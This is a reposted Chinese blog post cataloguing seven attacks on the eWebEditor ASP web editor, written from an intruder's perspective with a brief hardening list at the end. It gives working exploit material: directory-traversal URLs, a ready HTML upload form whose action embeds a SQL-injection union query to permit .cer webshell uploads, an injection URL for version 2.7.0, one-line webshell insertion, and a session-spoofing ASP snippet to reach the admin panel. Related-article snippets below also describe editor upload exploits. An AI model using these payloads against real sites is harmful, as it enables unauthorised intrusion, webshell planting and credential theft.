WebEdit在线编辑器的问题与漏洞(转)

最新推荐文章于 2024-05-14 06:36:46 发布
最新推荐文章于 2024-05-14 06:36:46 发布
阅读量3.4k 收藏 1
点赞数
文章标签: 数据库 asp session action 服务器 cookies

WebEdit在线编辑器的问题与漏洞
Ewebeditor编辑器目前分为asp,aspx,php,jsp四种程序,各类ewebeditor版本很多,功能强大颇收使用者喜爱,在国内使用极为广泛。对于目前asp版本的ewebeditor编辑器漏洞主要分为以下7点:

默认,遍历目录漏洞,一句话,注入,构造,cookie欺骗,社工(踩脚印入侵),

NO1.ewebeditor编辑器一般默认数据库路径是db/ewebeditor.mdb
默认的后台路径是admin_login.asp
建议最好检测下admin_style.asp文件是否可以直接访问

NO2.遍历目录漏洞(具体如下):
登陆编辑器---上传文件管理---选择样式目录(随便选一个目录)
得到:
ewebeditor/admin_uploadfile.asp?id=14
在id=14后面添加&dir=..
再加 &dir=../..
&dir=../../../.. 看到整个网站文件了
此漏洞危害大大的,绝对恐怖

NO3.当数据库被管理员修改为asp、asa后缀的时候,可以插一句话木马服务端进入数据库,然后一句话木马客户端连接拿下webshell

NO4.有的时候爆了数据库找不到后台地址让人发急,其实可以试试查看样式表,有没别人加入的asp、asa后缀样式表,也就是虽说的踩着脚印入侵。
还有的时候聪明的管理员也就是加“#”不妨社工试试,我可没少占便宜的
例如:db/#ewebeditor.asa、db/#ewebeditor.asp 、db/#ewebeditor.mdb

NO5.注入2.1.6的注入就不多说了,如下保存为html文件修改action,直接上传cer马

<H1>ewebeditor asp版 2.1.6 上传漏洞利用程序----</H1><br><br>
<form action="http://127.1/e/upload.asp?action=save&type=IMAGE&style=luoye' union select S_ID,S_Name,S_Dir,S_CSS,S_UploadDir,S_Width,S_Height,S_Memo,S_IsSys,S_FileExt,S_FlashExt, [S_ImageExt]%2b'|cer',S_MediaExt,S_FileSize,S_FlashSize,S_ImageSize,S_MediaSize,S_StateFlag,S_DetectFromWord,S_InitMode,S_BaseUrl from ewebeditor_style where s_name='standard'and'a'='a" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=Fuck>
</form>

有次无意的入侵使我发现了ewebeditor2.7.0版本的存在注入漏洞
简单利用就是
http://site/path/ewebeditor/ewebeditor.asp?id=article_content&style=full_v200

默认表名:eWebEditor_System默认列名:sys_UserName、sys_UserPass,然后利用nbsi进行猜解,对此进行注入取得账号密码

NO6.有的时候管理员不让复制样式,但是你又看到有个样式被别人以前入侵修改了存在asa或者之类可以传shell,但是上传插入工具没有,又无法修改怎么办那?也许很多人说应该可以加工具栏,但是我就遇见过不让加的
这样我们可以利用ewebeditor里的upload.asp文件进行本地构造进行上传具体如下: (略)

NO.7还有种方式是最近坏客发现的
利用WebEditor session欺骗漏洞,进入后台:
漏洞文件:Admin_Private.asp
漏洞语句:

<%
If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个amxking.asp内容如下:

<%Session("eWebEditor_User") = "11111111"%>

访问amxking.asp,再访问后台任何文件,for example:Admin_Default.asp

  面对此种威胁网站管理员应该做好如下的防范措施:
  1、使用了eWebEditor编辑器的网站,应及时修改该编辑器的默认数据库路径和后缀名,建议数据库多方几层目录,防止数据库被黑客非法下载
  2、修改编辑器后台登陆路径和默认的登陆用户名和密码,防止黑客进入后台管理界面
  3、对Upload.asp语句进行修改,防止黑客利用其上传ASP木马从而获得WEB权限
4、及时对网站服务器IIS配置中的应用程序扩展名映射进行整理,确保其它类型的文件不能在服务器网站上运行

turboking
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Edit_Plus中文版
04-30
≡≡≡≡≡≡≡≡≡≡≡≡≡『软件信息』≡≡≡≡≡≡≡≡≡≡≡≡≡ 软件名称: EditPlus v2.21 Build 361 汉化修正版 软件语言: 中文 软件类型: 文本编辑 授权方式: 免费软件 运行环境: Win2003, WinXP, Win2000, WinNT, WinME, Win9X 软件大小: 1.62 MB 开 发 商: http://www.editplus.com/ 软件汉化: tracky(tracky2002@163.com) ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡ ≡≡≡≡≡≡≡≡≡≡≡≡≡『软件简介』≡≡≡≡≡≡≡≡≡≡≡≡≡ 一套功能强大,可取代记事本的文字编辑器,拥有无限制的撤消与重做、 英文拼字检查、自动换行、列数标记、搜寻取代、同时编辑多文件、全屏 幕浏览功能。而它还有一个好用的功能,就是它有监视剪贴板的功能,能 够同步于剪贴板自动将文字粘贴进 EditPlus 的编辑窗口中,让你省去粘 贴的步骤。另外它也是一个非常好用的 HTML 编辑器,它除了支持颜色标 记、HTML 标记,同时支持 C、C++、Perl、Java,另外,它还内建完整的 HTML & CSS1 指令功能,对于习惯用记事本编辑网页的朋友,它可帮你节 省一半以上的网页制作时间,若你有安装 IE 3.0 以上版本,它还会结合 IE 浏览器于 EditPlus 窗口中,让你可以直接预览编辑好的网页(若没安 装IE,也可指定浏览器路径)。 ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡ ≡≡≡≡≡≡≡≡≡≡≡≡≡『修正内容』≡≡≡≡≡≡≡≡≡≡≡≡≡ 1.修正了一处“打开远程文件”窗口中的控件遮挡问题! ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡ ≡≡≡≡≡≡≡≡≡≡≡≡≡『汉化说明』≡≡≡≡≡≡≡≡≡≡≡≡≡ 1.这是汉化完全版,无序安装原版! 2.汉化了关于和注册对话框,并修改了这两处对话框的字体,感谢阳光灿 烂提供修改方法! 3.修正了语法着色窗口的字体问题!语法着色窗口的字体问题只有在 Win 9x 下才会出现!我也是用虚拟机才发现的... 4.汉化了部分非标资源,基本上不会出现什么英文了,部分剩下的部分英 文汉化后会导致程序出现异常,所以没有进行汉化!请用户见谅! 5.集成了 liangjihua 的使用技巧集萃,感谢 liangjihua! 6.压缩包中已包含注册机,请有需要的朋友自行注册! 7.如果遇到问题请先使用原版进行测试,如果的确属于汉化版的问题,请 与我取得联系,谢谢! ≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡≡ tracky 2006.02.20
webEditor
11-18
webEditor在线编辑
2024年最新fckeditor编辑器上传漏洞getshell——突破(1),2024物联网嵌入式开发不死我不倒
最新发布
2401_85011796的博客
05-14 1042
百度搜索fckeditor编辑器漏洞利用,找到参考链接:https://www.cnblogs.com/milantgh/p/3775396.html,按照链接中常用上传地址挨个进行测试。访问上传的文件后,发现是图片,并没有当作asp进行解析。_x(1).jpg,以前这种方法是可以的,但这个环境不可以,知道此方法就行。接下来,查看目标网站搭建平台,发现是IIS6.0,那么可以结合IIS6.0的解析漏洞进行利用。测试过程中发现第三个会弹窗提示,说明没有访问到上传目录,那么添加…上传logo.asp;
webedit在线编辑器
04-28
功能齐全! 包括文字格式、图片属性,链接,表情等功能相当齐全!
渗透测试学习 十六、 常见编辑器漏洞解析
weixin_30622107的博客
05-11 488
大纲:   FCKeditor编辑器利用   EWEBeditor编辑器利用   其他类型编辑器利用   (用编辑器的好处:比网站自带的上传按钮的安全性高) 编辑器利用   查找编辑器目录(通常在网站根目录、用户目录、管理员目录下)   目录扫描:御剑等   目录遍历   蜘蛛爬行:AWVS、BP、菜刀 常见的目录:   editor、edit、upfile.asp、up.h...
Web Editor插件 网页在线编辑器
SEO资源下载
05-02 1941
简介: Web Editor插件是一款简单好用的网页在线样式编辑工具,可以帮助你直接修改 当前网页上的几乎所有元素,帮助你更改网页中的图片和文字,制作出你想要的效果, 并且不需要任何专业技术,有需要的用户不要错过了,赶快来下载吧! 开发背景: 你是否经常在网上看到一些热点新闻报道或者社交平台言论的截图? 有时候,当你找到这些消息的真实出处后,却发现其原本的内容跟 网上流传的截图大相径庭。 那么,这些假截图是怎么做出来的呢 功能介绍: Web Editor插件是一款网页在线编辑器,它提供的编辑工具可以让你轻松
web-editor:网页编辑器
05-04
WEditor 该项目是智能手机测试框架子项目,可轻松使用Web浏览器编辑UI脚本。 截屏 安装 依存关系 Python3.6 + IE仅在Google Chrome进行了测试,似乎无法正常运行。 pip3 install -U weditor 对于开发人员 git clone https://github.com/openatx/weditor pip3 install -e weditor 用法 在桌面中创建快捷方式(仅Windows) weditor --shortcut 通过单击快捷方式或在命令行中运行 weditor 此命令将使用端口17310启动本地服务器,然后打开浏览器选项卡供您编辑代码。 端口17310是为了纪念创建的日期-2017/03/10 要查看更多用法,请运行weditor -h 热键(Mac和Win) 右键单击屏幕: Dump Hierarchy 热
UEditor编辑器两个版本任意文件上传漏洞分析
10-13 3397
前言 UEditor是一款所见即所得的开源富文本编辑器,具有轻量、可定制、用户体验优秀等特点,被广大WEB应用程序所使用。本次爆出的高危漏洞属于.NET版本,其它的版本暂时不受影响。漏洞成因是在抓取远程数据源的时候未对文件后缀名做验证导致任意文件写入漏洞,黑客利用此漏洞可以在服务器上执行任意指令,综合评级高危。由于时间仓促,本文分析不到位的地方还请多多谅解。 IT资源论坛:www.euei.com...
WebEdit在线编辑器
12-14
WebEdit在线编辑器是一款强大的富文本编辑工具,专为网页设计和内容管理而设计。它以其易用性和灵活性著称,允许用户直接在浏览器中进行文本编辑、格式化以及文档处理,无需安装任何桌面应用程序。这款编辑器的核心...
webEdit编辑器简单版
06-17
webEdit编辑器简单版】是一款基于JavaScript和HTML技术构建的轻量级在线文本编辑器。它主要用于网页内容的创建和编辑,适用于那些需要在网页上提供文本输入和格式化功能的应用场景。这款编辑器利用JavaScript的...
webedit6文体编辑器
11-20
WebEdit6文体编辑器】是一款专为网页内容创作设计的文本编辑工具,它提供了丰富的功能,使得网页编辑变得更加高效和便捷。这款编辑器适用于网页设计师、内容创作者以及需要进行HTML文本编辑的用户,旨在提升网页...
Web-Editor:Web可视化组态编辑器(Angular8)
05-02
Tempo 基于angular版本开发, 项目截图 ! DEMO数据存储在IndexedDB,不要清除本地缓存:cookie及其他网站数据 ! 商业开发请开发对应后台服务 下载 前端 git clone https://github.com/bojue/Web-Editor.git cd Web-Editor npm install 运行 默认运行命令,需要服务端支持,也就是所以tag v0.1.0之后的版本,请先下载 并完成服务端启动。 npm run dev //or npm run start 使用说明 功能列表 拖拽创建组件 页面管理 元素列表 样式绑定 快捷键 预览 项目管理 服务器支持 (仅v0.1.0支持) IndexDB 快捷键 名称 快捷键 拷贝 control+ c 复制 control+ v 删除 delete 位置 上,下,左,右键 开发文档 编辑器代码组织 .
webedit文件管理程序
03-25
管理员:master密码:123数据库密码:u826yop 一,作者序 -------------------------------- 作者发现有人将作者的代码版权申明去掉后,就宣布是他写的,真是令人去愤, 本来想对代码进行加密的,但想到开放源代码,大家才能共同进步,所以也 还是公开,不过希望在使用本程序时,留下版权申明。 二,功能 ------------------------------- 1.对于服务器上的文件、目录进行批量的复制、删除、移动。 2.无须组件的多文件同时上传。 3.多功能的文件编辑。 4.强大的多用户管理体系,可以对用户进行目录与文件的访问限制。 三,配制说明 ------------------------------ 程序运行于Win2000+IIS5.0或win2000以上的版本 include.asp-公用配制文件 login.asp-登陆与用户管理文件管理员:master密码:123数据库密码:u826yop index.asp-主文件 upfile.asp-文件上传 editfile.asp-文件编辑器 四,版权 ------------------------------ 本程序版权归化境编程界的稻香老农所有,在不对版权进行修改的情况下,可以 任意传播本程序。不得用于商业目的
webEdit控件
07-17
7. **安全考虑**:作为一款在线编辑器webEdit控件在设计时应当考虑了防止XSS(跨站脚本攻击)和其他安全风险,确保用户在编辑内容时不会引入潜在的安全问题。 8. **技术支持**:尽管控件本身是免费的,但开发者...
admin/edit_languages.php,ecshop后台语言项执行漏洞edit_languages.php详解
weixin_30428981的博客
03-26 209
漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。 以下是详细分析 1.登陆到ecshop台后,选择模板管理,语言项编辑,搜索用户信息 为什么要搜索用户该漏洞需要能登录ecshop后台权限,简单修改下语言项目,即可在网站植入木马后门。 以下是详细分析1.登陆到为什么要搜索“用户信息”,还可以搜索其它的吗?答案是搜索languages\zh_cn\user.php文件...
方卡在线php程序漏洞,方卡 ISite企业建站系统V1.1.9上传绕过可以得到SHELL
weixin_32083393的博客
03-13 375
漏洞概要缺陷编号:WooYun-2012-09394漏洞标题:方卡 ISite企业建站系统V1.1.9上传绕过可以得到SHELL相关厂商:方卡在线漏洞作者:black hook提交时间:2012-07-09 21:38公开时间:2012-08-23 21:39漏洞类型:URL跳危害等级:低自评Rank:5漏洞状态:未联系到厂商或者厂商积极忽略Tags标签:漏洞详情披露状态:2012-07-09:...
web 编辑器_什么是Web编辑器
culin0274的博客
08-07 1786
web 编辑器 什么是Web编辑器? (What Is Web Editor?) A web editor (also called HTML editor) is a useful application for creating web pages. The HTML code you can also write with a text editor, however, applicatio...
eWebEditor-基于web方式编辑器
mcjentor的专栏
10-30 723
 eWebEditor是一个基于浏览器的在线HTML编辑器,WEB开发人员可以用她把传统的多行文本输入框替换为可视化的富文本输入框。eWebEditor主功能不需要在客户端安装任何的组件或控件,操作人员就可以以直觉、易用的界面创建和发布网页内容。您可以通过eWebEditor自带的可视配置工具,对eWebEditor进行完全的配置。eWebEditor是非常容易与您现有的系统集成,简单到您只需要一
dedecms织梦留言板edit.inc.php注入漏洞修复
09-06 242
dedecms注入漏洞,路径:/plus/guestbook/edit.inc.php。dedecms留言板edit.inc.php注入漏洞修复方法。打开edit.inc.php文件。在这两行中间加入一行以下代码。
无法标识对象“username”(属于类 WebEdit)。 验证此对象的属性与当前显示在应用程序中的对象是否匹配。 第 (2) 行: "Browser("登录").Page("登录").WebEdit("username").Set DataTable("username", dtGlobalSheet)"。
06-08
这个错误提示表明在你的代码中调用了一个名为"username"的WebEdit对象,但是该对象可能不存在或者与你的代码中描述的不一致。你可以检查一下: 1. 对象库中是否存在名为"username"的WebEdit对象。 2. 该WebEdit对象...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值